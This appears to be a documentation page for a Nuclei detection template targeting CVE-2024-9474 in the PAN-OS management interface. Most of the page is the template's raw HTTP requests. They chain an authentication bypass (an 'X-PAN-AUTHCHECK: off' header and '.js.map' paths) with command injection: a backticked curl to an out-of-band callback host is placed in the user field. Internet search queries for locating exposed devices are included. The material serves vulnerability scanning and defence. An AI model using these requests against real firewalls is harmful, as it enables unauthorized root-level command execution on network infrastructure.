PAN-OS Management Web Interface - Command Injection
ID: CVE-2024-9474
Severity: high
Author: watchTowr,iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,panos,rce,kev
Description
Section titled “Description”A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.Cloud NGFW and Prisma Access are not impacted by this vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2024-9474
info: name: PAN-OS Management Web Interface - Command Injection author: watchTowr,iamnoooob,rootxharsh,pdresearch severity: high description: | A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2024-9474 cwe-id: CWE-78 epss-score: 0.02252 epss-percentile: 0.89926 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: paloaltonetworks product: pan-os shodan-query: - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" - http.favicon.hash:"-631559155" fofa-query: icon_hash="-631559155" tags: cve,cve2024,panos,rce,kev
flow: http(1) && http(2) && http(3)
variables: rand: "{{to_lower(rand_text_alpha(5))}}"
http: - raw: - | GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1 Host: {{Hostname}} X-PAN-AUTHCHECK: off
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "0.0.0")' - 'contains_all(header, "Expires: 0", "PHPSESSID=", "application/json")' condition: and internal: true
- raw: - | POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1 Host: {{Hostname}} X-PAN-AUTHCHECK: off Content-Type: application/x-www-form-urlencoded
user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1
matchers: - type: word part: body words: - "@start@PHPSESSID=" internal: true
extractors: - type: regex part: body name: phpsessid group: 1 regex: - '@start@PHPSESSID=(.*?)@end@' internal: true
- raw: - | GET /index.php/.js.map HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID={{phpsessid}} X-PAN-AUTHCHECK: off
matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(body, "panos")' condition: and# digest: 4a0a004730450220420836f09725d549dd1af4f7dba8c3eb6a8dbb78495859d89bb9c58c1d5e9999022100fa34bea47d574d3e71373b81b4614dabcc3d869f47cb92ccc8c8006fae81db2b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9474.yaml"